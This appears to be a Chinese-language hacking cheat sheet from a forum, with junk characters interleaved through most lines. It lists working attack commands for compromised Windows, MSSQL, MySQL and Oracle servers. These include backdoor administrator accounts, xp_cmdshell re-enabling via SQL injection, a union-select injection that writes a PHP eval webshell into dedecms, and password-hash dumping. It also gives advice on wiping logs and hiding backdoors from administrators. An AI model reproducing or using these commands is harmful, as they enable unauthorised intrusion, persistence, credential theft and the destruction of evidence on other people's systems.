) K5 K( k: [- M6 `. J1.net user administrator /passwordreq:no
4 P" N% F4 F( l' ~2 M5 Z2 ]这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了% a2 Z. _9 }: @, O U
2.比较巧妙的建克隆号的步骤6 c3 _, u" Q1 B$ Y, j
先建一个user的用户
5 E2 ]! F0 r; [然后导出注册表。然后在计算机管理里删掉
% _; z% t$ A- L `1 S3 l8 N. b在导入,在添加为管理员组
' K ~' j+ D* M( f/ M) P) K3.查radmin密码
; V: q. V. w$ I+ r: C. R, zreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg2 I0 z) H% U3 |3 i- e) t
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
1 S( j$ q/ Z2 y4 |: M: I建立一个"services.exe"的项9 g4 Y6 b0 H; G2 m; }$ q
再在其下面建立(字符串值)
" z1 v7 v R5 d) ]键值为mu ma的全路径3 o9 v v7 C# g h
5.runas /user:guest cmd
' M) z* s; z0 |9 r测试用户权限!
- e% L1 ~" v! [/ R9 V6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
P" B9 t ]4 M3 K4 ^9 i( v9 ^7.入侵后漏洞修补、痕迹清理,后门置放:
- m% i( a% \+ f3 G基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门; `/ ?( s( `2 X, k
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c' H) {$ U* C( m! c0 r5 g
; {4 I' s% C; `2 [: K
for example
0 d5 n6 G, o3 D# p8 I" M3 {
/ C8 n$ Y& f' F% vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
' f( f# w/ V' F1 g: a/ S' M- r; t* a$ ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
/ A! f" u. p! ^3 b" `9 m% e& g! |. l6 o5 u) n
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了, K/ V& M5 e# x9 G
如果要启用的话就必须把他加到高级用户模式3 H1 i6 O* k) F4 O: \
可以直接在注入点那里直接注入
, G# d- E# ~. K: ~( |7 Vid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
, m1 s1 w5 {/ p* C- L然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--2 { C" z9 @ l
或者
$ B3 r% ?6 W7 Y7 p' L0 ?sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
+ {1 p& D9 |. o0 _/ v6 X, i( {: {来恢复cmdshell。. S# S- {5 b* Q! f
; g9 l" }5 }6 Q0 u
分析器
& l. X t3 K+ u/ E. [# ~EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--- Z- @9 E! t1 U2 R3 i) R2 @3 v
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
' W4 Z% @. G8 D r0 b) I& t5 \* _10.xp_cmdshell新的恢复办法
9 s, H' e2 Y/ [ `xp_cmdshell新的恢复办法. M4 T, L3 D/ C, Q
扩展储存过程被删除以后可以有很简单的办法恢复:
+ k. @% X, i/ W4 v删除
H% A# \" ?! j; r+ D ]1 C6 }3 zdrop procedure sp_addextendedproc( d. G- f7 A# @2 X6 }9 Y7 n
drop procedure sp_oacreate/ A6 \3 B0 m& N# r" }: x4 l
exec sp_dropextendedproc 'xp_cmdshell'
% P$ |: [3 t' a7 S _& f/ Q4 [( c) I1 L! J C% A
恢复
% s- y/ z- F0 K+ f2 { ~dbcc addextendedproc ("sp_oacreate","odsole70.dll")5 D/ }& T4 H x8 Y, D1 W& ]% Z# m* |6 c
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")0 D2 ~1 p& y# A8 @' S
- n* }1 e" R0 A8 R8 N5 e, y
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
+ ~( h+ l9 A( q$ V0 R. B8 l4 i! W5 p; C7 U, A
-----------------------------
# v* R. ~( ~' I Q2 N0 _. s$ k' B; @! ? F9 \' X& M
删除扩展存储过过程xp_cmdshell的语句:
8 Q) A; d$ \$ `5 i9 Oexec sp_dropextendedproc 'xp_cmdshell'
, A) a" P% E# W4 X+ h4 X* A- v2 J& F3 C( U
恢复cmdshell的sql语句2 h* m2 z5 I6 T, |( y
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
0 f. \1 K9 B! p5 G" l3 a) O7 T G3 n; v; T1 j7 J I; q& x, F
% Z% L' M" g2 p开启cmdshell的sql语句$ t% Q; e9 }9 N& L; O
: L9 O5 g# x* `& F! C( M* N8 fexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
0 ]8 b2 d) W$ Z" q% t- |9 W# j6 D5 c4 J+ h4 \+ P4 u
判断存储扩展是否存在
8 A6 u; I2 @. I T& lselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
0 V6 B4 i0 ~* a. U# G% M5 Q" ^' B返回结果为1就ok
& V! P7 t. K; t' L4 p8 u. s7 v- K9 @4 t, x }5 e8 o% s3 c1 |
恢复xp_cmdshell A9 P1 T; U4 A1 l8 p4 c i
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'5 K# n' T/ j& j
返回结果为1就ok" J8 R3 `6 W3 w \8 L4 p
V3 `; ~4 z4 v+ F# K
否则上传xplog7.0.dll% K1 t" c0 S/ g+ h3 r
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll': k7 A/ c0 u" T% B$ P j) k A9 ~
3 x% G+ e- |( k9 G( ?) l# H9 t e. j堵上cmdshell的sql语句4 I' i- G' p1 X
sp_dropextendedproc "xp_cmdshel
6 E3 m9 t6 z( F- U5 ^-------------------------
6 x% b2 ?/ F# _& p" x: T8 |1 u清除3389的登录记录用一条系统自带的命令:
, L, k8 x* ?4 `4 I/ b+ [6 [reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
" v; @5 l8 Y' k0 F" c* ]& G. @/ F/ _9 s) t
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
1 p( q( n. Q$ y7 `7 ~在 mysql里查看当前用户的权限( i- s# ]8 H8 H, l( g# X+ u
show grants for
' Z0 W: |% P7 \8 J1 ]
/ U) W, b3 Z, T0 u! h0 W+ `以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
- |, i. u6 x: H7 R+ I( M, C( I, t0 |$ ^ t
7 y: ~* l1 G* v' n$ h' [0 X( uCreate USER 'itpro'@'%' IDENTIFIED BY '123';
2 c* l% [' j7 M# E$ A' U/ e# _# u4 j: u/ Z0 w
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
* t+ P" g9 I7 H; c! D& Y" c6 \' v
( B+ M" V! A5 I; _0 q4 OMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
2 }6 b- ]0 e, v- P
! E6 N- w* X: Z$ X! e; KMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;$ L; I1 s! r B( t1 N$ i/ v% p
" u1 Q- S9 d( W- ]+ E/ N4 ?6 v
搞完事记得删除脚印哟。( t! l, ?* K C1 ]+ Z. k- U5 ~) m' `
' C O# H8 t9 a+ t( lDrop USER 'itpro'@'%';5 q4 A* A: c1 F* R5 Q' x; E+ Q
0 j( x2 k, C Y1 VDrop DATABASE IF EXISTS `itpro` ;
, E* e! K% v9 { W0 U3 y& R- G
; K4 J7 Q: }6 T3 F Q当前用户获取system权限- [& z- a: o$ @% a; t7 w
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
; j. s O$ i5 h6 Z3 e$ X5 nsc start SuperCMD
2 _8 w, C1 @% e0 N3 J$ q; _程序代码& V' G4 B3 @: ]2 n
<SCRIPT LANGUAGE="VBScript">: K* `! s% V4 n" r8 o
set wsnetwork=CreateObject("WSCRIPT.NETWORK")3 N5 Y2 n. E& `. C7 g
os="WinNT://"&wsnetwork.ComputerName
6 n1 k/ _' {: [6 l( kSet ob=GetObject(os) }2 _6 m# c+ R& w& I
Set oe=GetObject(os&"/Administrators,group")0 n) o5 f8 s9 T
Set od=ob.Create("user","nosec")
8 e; i" ? V8 ^" Lod.SetPassword "123456abc!@#"& z o0 @5 F! @9 b% R% ^
od.SetInfo
$ q8 k2 q0 r1 dSet of=GetObject(os&"/nosec",user)
8 A9 l) Z. n1 u: _" m- Q* yoe.add os&"/nosec"2 M$ n: J/ S7 T; l, ~
</Script>
# _3 ~5 D# ?2 ]3 h( f& r& @<script language=javascript>window.close();</script>
: i" |) F S& x! d9 y2 X+ D/ b. x, a
- G8 ]1 j3 C# z5 b# j* I6 F4 B5 p
% i2 R) @$ ~5 t+ k
3 |* d, v, g2 N& V突破验证码限制入后台拿shell
3 D9 ?4 N) M5 L* C8 C程序代码/ e- M* g R4 {/ L+ w
REGEDIT4 ; Y/ L% x* `# I& P9 \, c, `
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 3 H: L, p8 ~5 p4 q
"BlockXBM"=dword:00000000
; n; k( j6 F/ E5 ]8 I- j6 } y" @" q8 H" k
保存为code.reg,导入注册表,重器IE# T5 x. b. C: s, R
就可以了
/ B7 x- l f: r. U5 S: ^union写马
2 Q9 c' E( \! y. B5 x" H程序代码
# f \! f/ e3 ?www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*. |; `8 R7 T6 s( z" e5 C
Z3 e: j; E' ?应用在dedecms注射漏洞上,无后台写马- f8 T" c! [, o# e4 T
dedecms后台,无文件管理器,没有outfile权限的时候+ Y, F8 E6 _; k" s- w/ o
在插件管理-病毒扫描里
2 y5 e: ?) {* q7 Y$ x. c- t3 ~写一句话进include/config_hand.php里+ d" R- w' b( f+ Q3 S) s1 v
程序代码; R) q' C1 B' L+ Z8 a5 `; G
>';?><?php @eval($_POST[cmd]);?>
6 @7 @8 X+ S2 z. B1 w& I1 a6 U/ V# N. m5 O7 A8 x5 i @$ P" L
6 T3 m3 {* w9 L" C x. S如上格式+ H7 O- @$ q* E; A8 J) Q8 S8 C% M
* B7 W5 l' ]9 u. i
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
0 O# x5 m! C+ k程序代码+ n; F% S1 b6 o. R7 m
select username,password from dba_users;
0 ~) H! X, r8 G2 J3 q
7 r+ |( j: h) u( `! t* y7 U! N# y' e
2 }3 m. \+ Z% }) w- ^% J- zmysql远程连接用户0 Z; v3 L/ K+ F* D+ j5 w! U7 F9 d
程序代码
1 G- ^2 ]$ m) D% S8 n
' Q# Z7 U0 [' U+ S- {) RCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';4 J" M: V9 h$ c5 z$ F5 U
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION7 K% }8 r6 V' k) h1 b/ A4 h
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
2 Q( b: G& Z0 _( a& |MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 q/ e, i! M- G* K- K( @( V
- f& H; `3 j! k a: y3 i+ h" ^' m# x s9 N( E! \* A2 h* h7 y
. P0 G( k" F3 x+ z7 d
) p* I7 @" |+ Z) L) o& x2 `echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 03 _( @: a2 ?% b
1 r; s0 x: y% ~8 W* W3 k
1.查询终端端口
% e9 r" g" u- a( i6 B8 e) g7 I3 e9 J1 p- d6 `, s; w# m
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
3 k; P, R0 t2 a8 U: W! x3 z6 ]$ L7 b; {
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"* K0 _0 x! j5 ~7 Q
type tsp.reg
! T* o3 l; }, G6 C+ J% Y. f* I. d& K, u7 n. V% Q+ z# h
2.开启XP&2003终端服务 ] [% n v6 w1 Y' [& S8 u
& \4 w' } K: ]' o! p1 e
5 ^9 ~4 {/ F$ L9 l7 I0 CREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
- u$ C, l- y- C! m4 ?6 R! v
* P, L1 ?: {/ s) l' A H, d
7 ^+ W4 v1 ]9 s! j6 HREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f* J& S% x; {2 U9 D
" i. k% w- _ W& H3.更改终端端口为20008(0x4E28)
; E# A F; Y3 R* S
, K: i" ?& o1 q) V3 e# sREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f& z. I( t( V3 C5 E( k# J
) P T2 h/ T" |: P8 Q# Q9 X' m
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; d% i. ]' [' M5 E$ C, C& F. O6 o( }9 S
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制! L2 V) r3 I' \3 o
% k1 L3 _; ?$ ~4 Q& j7 p
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f1 C" N; n8 b! Q5 {! j# |& N
/ G2 y& b4 b3 C- ^. M/ [
' N. f p8 o0 Z, E" _, L, l5.开启Win2000的终端,端口为3389(需重启)3 T0 s- {6 P! r* c* k6 u! _
5 r. O* }0 o% i6 T+ pecho Windows Registry Editor Version 5.00 >2000.reg
! q" q& @3 f9 U* fecho. >>2000.reg
$ q2 K* v: f5 T* T2 \9 U3 Eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ' g' L% p7 k4 v+ U( S
echo "Enabled"="0" >>2000.reg ) c6 t$ O; _) s7 M8 w7 z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
7 D I& Y3 V" {( d+ d; } Wecho "ShutdownWithoutLogon"="0" >>2000.reg 0 \! o' ]4 _% B
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
5 ~# f$ w# ^# e! E- Qecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg ( O! D5 m5 q3 ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
[& o0 m3 T) y4 t6 p' Mecho "TSEnabled"=dword:00000001 >>2000.reg & z$ @3 b6 E& m6 F4 y- M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
1 M2 A7 l2 \ @echo "Start"=dword:00000002 >>2000.reg
8 ]! t8 a; |" t; C0 [: {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
3 V% ~6 m) T0 ]# O1 }echo "Start"=dword:00000002 >>2000.reg
% V! i) Q+ A5 [2 z6 gecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
* z9 ]0 v# W, v' U3 a7 b* g/ }8 iecho "Hotkey"="1" >>2000.reg 8 y4 ?/ \1 w, m8 c Y. z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
X2 R. d) _. o- m' P6 Techo "ortNumber"=dword:00000D3D >>2000.reg
8 R+ T, I' g6 A# z3 t* _# ^% T2 T+ I2 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
% ~- k" n C/ s# q$ L. M5 |echo "ortNumber"=dword:00000D3D >>2000.reg
5 z2 h$ D( ]7 u/ D2 v* |/ y3 a- L0 K- r# j( ?- w
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
; i" x8 [0 [! D$ q0 v$ ?) `' h1 R c7 V. Q' R
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
/ z4 d" k% [& R2 A/ D( V(set inf=InstallHinfSection DefaultInstall)+ d4 G; V5 I4 P! Y& ^
echo signature=$chicago$ >> restart.inf
" S* W6 g4 k1 q5 i4 U- Recho [defaultinstall] >> restart.inf6 Q9 k9 R1 F5 g1 `
rundll32 setupapi,%inf% 1 %temp%\restart.inf% G. W; N4 g% I
# Y4 e" |/ ]- Z! h, n
/ b/ a# I- @: O! [7.禁用TCP/IP端口筛选 (需重启)2 j' a0 a# T! F! j
- `, \, ]: I5 {8 Z! ` V4 Z0 [* A
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
0 l# a( i" ?$ Q/ M/ o& R% w( \6 @, n( d1 w6 \$ M$ F' G8 q
8.终端超出最大连接数时可用下面的命令来连接
: K! v7 q' U) x/ }8 b1 H3 `* D4 U+ ]$ j) d2 r2 @* a) d5 r; Q
mstsc /v:ip:3389 /console2 r/ F0 ?$ {2 X) I/ p5 k! L- s
/ c4 [2 w' y( b* R
9.调整NTFS分区权限
9 E/ r& T I+ n' h7 ~+ r3 t1 u! ^! N8 M" i2 ]/ i7 f
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)- `% S* D9 E6 u# Z9 f5 R+ y9 l9 S
6 @' R9 R+ I- b9 Ccacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)+ @2 d0 K0 j. K
4 K, W, W! {% R7 b; e------------------------------------------------------" Y9 ~4 u" f" Z+ n. U
3389.vbs
3 C3 S3 w* q! V3 OOn Error Resume Next6 z! J# K9 {! l" P
const HKEY_LOCAL_MACHINE = &H80000002
; [% v8 y- Z8 c; N% LstrComputer = "."
: Y9 u' ~: X! [ f1 |' rSet StdOut = WScript.StdOut
# J4 W5 p! t6 R/ B# ISet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
3 G) R+ Z+ ?% ^2 E, Q1 QstrComputer & "\root\default:StdRegProv")
2 P1 D/ |0 N' g' qstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
! g z7 t/ b" T1 v g8 W9 | ~. {/ m* _oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' O) i" A& E! @7 tstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"6 V- M; I5 G, x: y: u1 {* |2 W/ T) r5 J9 ^
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath2 U6 t! ^7 W4 H+ D
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", p$ m* E* \' [7 `
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"7 k" t5 s9 c5 M" Y0 N" l
strValueName = "fDenyTSConnections"# C; x. a4 }% g
dwValue = 0: P* v$ m8 Z" t/ ]. \5 X
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 J# |9 Z+ I7 s: ]* W7 istrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
( C" C9 z! K. K3 L% l R( mstrValueName = "ortNumber"8 y7 L' m z, P# {, T& A) A% l& B
dwValue = 3389; M B9 O3 s0 J ~' ]- k1 j
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue. e7 S* o3 R3 [! v
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
$ X3 Y! N q: `! s# J+ xstrValueName = "ortNumber"
: E6 T% q; h0 S# rdwValue = 33895 Q0 A3 H3 J" t& S+ s
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue% {" [3 _3 o) l1 R1 G
Set R = CreateObject("WScript.Shell") 1 w% N H- v+ N P% P, h
R.run("Shutdown.exe -f -r -t 0")
9 x+ K# \* R" q8 z( D: q# V( @7 e0 `9 `% V9 a
删除awgina.dll的注册表键值
9 Y- e' e8 L0 V2 _7 E4 S& p程序代码. _7 N; O. {& n4 T1 l
. i' R. }; t0 A5 o5 r. j+ B' U
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
1 U4 c( a' N- A& \# s6 G3 P/ Y/ ?+ C9 ^
* B7 y: x0 g. m" x; L' u8 X; m9 e: U4 L4 c
' R! I( ~4 n% p# V! l! V) }程序代码5 Z) y) d9 X; N ?0 r
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
) F/ g5 b, w. J$ k1 T: U
r6 R. Q) V- v: K q1 o$ A/ j- s设置为1,关闭LM Hash9 x% M% v' \9 ^. D
- R* e) E! a- V1 G$ x数据库安全:入侵Oracle数据库常用操作命令6 a/ o" ?- G; b& F
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
9 k1 A) a/ y5 x6 p% B( R1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。1 D5 n7 h/ h. \0 d* F
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
7 ]4 Z$ ?3 s- A3、SQL>connect / as sysdba ;(as sysoper)或' i9 `) g9 {& Q! A
connect internal/oracle AS SYSDBA ;(scott/tiger)) P; i" f. C* h+ r9 ^5 _0 P4 i
conn sys/change_on_install as sysdba;
w5 e B- y8 p. o; D4、SQL>startup; 启动数据库实例
- e+ q! t, K6 Y7 x( M+ v C/ K5、查看当前的所有数据库: select * from v$database;; `5 F" ]* O' [$ H
select name from v$database;
# I0 ~0 g3 ` h6、desc v$databases; 查看数据库结构字段
! {5 O9 P! Z7 A: }9 z7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:; y3 P" P, k& |6 s! o
SQL>select * from V_$PWFILE_USERS;% K! Y l6 @$ N* B7 i1 I
Show user;查看当前数据库连接用户
; D% h# @8 h- X# Y1 i# j4 k1 X$ E8、进入test数据库:database test;7 ^" K# R1 P% R7 C7 _
9、查看所有的数据库实例:select * from v$instance;8 ?" Y* D1 m7 Y9 ^) y
如:ora9i
( x# K% w% }/ |8 Z7 H10、查看当前库的所有数据表:
" e0 v3 @9 T( y. |SQL> select TABLE_NAME from all_tables;, _1 ]1 E) [8 o9 N5 b; _7 D* H: R
select * from all_tables;) t5 D* E( t( ?- K3 C
SQL> select table_name from all_tables where table_name like '%u%';
$ ^7 L- y+ u7 N6 n/ U) _TABLE_NAME# p# @7 o2 P" Z( [1 |) ~
------------------------------
0 F9 R" w/ e6 t% L_default_auditing_options_& g: A. v/ u! u& E# R
11、查看表结构:desc all_tables;; r% j1 I6 ]! j
12、显示CQI.T_BBS_XUSER的所有字段结构: C+ L' ]6 p3 Y2 H3 }8 z0 A1 y" h$ h
desc CQI.T_BBS_XUSER;
4 y$ F1 ]+ d2 ?13、获得CQI.T_BBS_XUSER表中的记录:' M9 V' b# { @/ [
select * from CQI.T_BBS_XUSER;
# @9 ?+ M' x1 C+ o14、增加数据库用户:(test11/test)# S9 o; u. _( R3 b
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;/ S( C, c/ Z W' I% h( m
15、用户授权:
0 ~# M, s$ |3 L2 `- Ygrant connect,resource,dba to test11;( I% `3 [: x1 i
grant sysdba to test11;
& e+ b5 d+ F, ^5 Rcommit;
g2 N7 J0 e+ L9 k0 W# e$ l1 M" E) q" @16、更改数据库用户的密码:(将sys与system的密码改为test.)+ e+ {' I: ]8 d
alter user sys indentified by test;
* K2 n4 s, v5 j; {& [alter user system indentified by test;+ V3 ? X. s8 H% a3 ^" E7 y5 s
) t% _. t% \9 @( O* Z- ]) N2 O6 ZapplicationContext-util.xml) q8 |/ u3 T: K/ K. r
applicationContext.xml
: ] |4 Y- k: h0 Y! Vstruts-config.xml
6 ]& w2 w4 u) C6 Q5 Iweb.xml
, U; F" D, T \/ l! P% O6 t9 qserver.xml% q5 u# n/ `9 s
tomcat-users.xml
6 I" ]: c5 q4 Y6 Khibernate.cfg.xml
2 x3 s h8 s' G9 I* T( V' l3 Ndatabase_pool_config.xml$ V3 i3 {9 h1 l/ p: L
' ]3 c$ o8 f$ A' _# N
' m# K" j0 B* N; j; V# X( H
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
; V* x/ _) t4 Q4 J3 ]% }* }\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini7 C5 T, M: J p, `3 @
\WEB-INF\struts-config.xml 文件目录结构
/ X) ?! G: v: n; e& n7 d# D% V+ {
spring.properties 里边包含hibernate.cfg.xml的名称) ^0 B t3 V. |0 }( y8 s
0 g1 M" `, B& j# Y
0 a6 w" \% y5 ~( f' ^' ]) j
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
$ b: l. E8 f3 ?! I9 Y( G
0 @2 |7 a: c0 B1 h3 X7 d! Y+ U如果都找不到 那就看看class文件吧。。" q9 t! z8 I8 t$ j' O
; H" a+ Y, b1 [( i6 N$ \' x测试1:- z% e3 z2 w% ~4 W9 S
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t10 a+ j) {/ o% c) e7 W- f* C
9 t- H0 H, Y% b& |) z测试2: d) x7 s5 I: I- e7 d
/ C( l' W$ u1 ~4 j* ^) D2 y* U* Ycreate table dirs(paths varchar(100),paths1 varchar(100), id int)) l/ X1 E$ M" e2 @
( m6 @) ^* z5 m8 bdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--" e8 x. h8 u) V% _- G
4 p# f. \9 e7 g! ^$ lSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
$ }( Q% p0 [8 m8 Q z; l8 n' A+ k
查看虚拟机中的共享文件:
& X" T- p. v, G; \6 O在虚拟机中的cmd中执行& w, i5 s# k5 |# B8 n0 \
\\.host\Shared Folders
( k2 i+ Z! _1 I' q! ~$ T; A/ ^- F L
& \/ F' r) H! m: e! D- ucmdshell下找终端的技巧
( \2 f+ ]6 r, q+ i! D+ n# f找终端:
, M# X. b2 k4 [% m第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
0 D5 i& ~ n3 l1 V) u 而终端所对应的服务名为:TermService 5 q: F5 Y u1 W
第二步:用netstat -ano命令,列出所有端口对应的PID值! 2 F$ O9 r9 X8 D/ O. s7 x6 I
找到PID值所对应的端口
" o0 i; D1 p. W4 t3 q4 E' E) k8 f
查询sql server 2005中的密码hash/ _5 v. N) \/ ?
SELECT password_hash FROM sys.sql_logins where name='sa'
) c1 r& ?1 e7 T% i. U4 } uSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a# H( f# P$ i+ e5 }
access中导出shell" B+ D) B. c4 d( Y$ m6 `- W
1 I/ ~. N9 ^8 J: G% V( s1 J( k
中文版本操作系统中针对mysql添加用户完整代码:/ i# [& p2 |$ j# u8 Z+ ?
& h( t" G% W5 s% ~ {, O
use test;" e# w2 f; _9 H1 ?; @& U% l/ G0 X
create table a (cmd text);
